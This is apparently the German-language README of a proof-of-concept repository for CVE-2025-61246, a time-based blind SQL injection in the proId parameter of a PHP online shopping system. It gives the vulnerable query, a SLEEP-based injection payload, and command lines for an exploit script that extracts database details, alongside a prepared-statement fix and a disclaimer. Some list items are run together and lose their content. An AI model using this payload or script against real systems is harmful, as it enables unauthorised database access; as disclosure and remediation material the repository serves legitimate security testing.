
CVE-2025-61246: SQL Injection vulnerability PoC in Online Shopping System PHP
Dieses Repository enthält einen Proof of Concept (PoC) für CVE-2025-61246, eine kritische SQL-Injection-Schwachstelle, die in der PHP-Anwendung Online Shopping System entdeckt wurde. Die Schwachstelle ermöglicht es einem nicht authentifizierten Angreifer, beliebige SQL-Befehle durch zeitbasierte blinde SQL-Injection auszuführen.
/online-shopping-system-php-master/review_action.phpproIdDie Schwachstelle existiert im Endpunkt review_action.php, bei dem die vom Benutzer bereitgestellte Eingabe aus dem Parameter proId direkt in SQL-Abfragen eingefügt wird, ohne ordnungsgemäße Bereinigung oder parametrisierte Abfragen. Dies ermöglicht es einem Angreifer, schädliche SQL-Payloads einzuschleusen, die Folgendes können:
// Vulnerable code (example)
$proId = $_POST['proId'];
$query = "SELECT * FROM products WHERE id = " . $proId;
mysqli_query($conn, $query);
Ein Angreifer kann diese Schwachstelle ausnutzen, indem er:
/online-shopping-system-php-master/review_action.php sendetproId einfügtproId=1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -
Dieses Repository enthält:
exploit.py) - Python-Skript zur Erkennung und Ausnutzung der SchwachstelleMANUAL_TESTING.md) - Schritt-für-Schritt-Anleitung zur manuellen Ausnutzungdocker-compose.yml) - Docker-Umgebung für sicheres TestenREMEDIATION.md) - Sichere Codierungspraktiken und PatchesPython 3.7+
pip install -r requirements.txt
# Clone the repository
git clone https://github.com/hackergovind/CVE-2025-61246.git
cd CVE-2025-61246
# Install dependencies
pip install -r requirements.txt
# Run the exploit
python exploit.py --url http://target.com/online-shopping-system-php-master/review_action.php
# Detection only (no exploitation)
python exploit.py --url http://target.com/review_action.php --detect-only
# Extract database name
python exploit.py --url http://target.com/review_action.php --extract-db
# Full exploitation with custom timeout
python exploit.py --url http://target.com/review_action.php --timeout 10 --full-exploit
# Use proxy for testing
python exploit.py --url http://target.com/review_action.php --proxy http://127.0.0.1:8080
Eine erfolgreiche Ausnutzung dieser Schwachstelle kann zu Folgendem führen:
// Secure implementation using prepared statements
$proId = $_POST['proId'];
$stmt = $conn->prepare("SELECT * FROM products WHERE id = ?");
$stmt->bind_param("i", $proId);
$stmt->execute();
$result = $stmt->get_result();
Detaillierte Schritte zur Behebung finden Sie in REMEDIATION.md.
⚠️ WICHTIG: Dieser PoC dient ausschließlich zu Bildungs- und autorisierten Sicherheitstestzwecken. Unbefugter Zugriff auf Computersysteme ist illegal. Der Autor übernimmt keine Haftung für Missbrauch dieser Informationen. Holen Sie stets eine ordnungsgemäße Genehmigung ein, bevor Sie testen.
Govind Pratap Singh
Dieses Projekt ist unter der MIT-Lizenz lizenziert - siehe LICENSE für Details.
Verantwortungsvolle Offenlegung: Wenn Sie eine Sicherheitslücke entdecken, melden Sie diese bitte verantwortungsvoll an den Anbieter, bevor Sie sie öffentlich machen.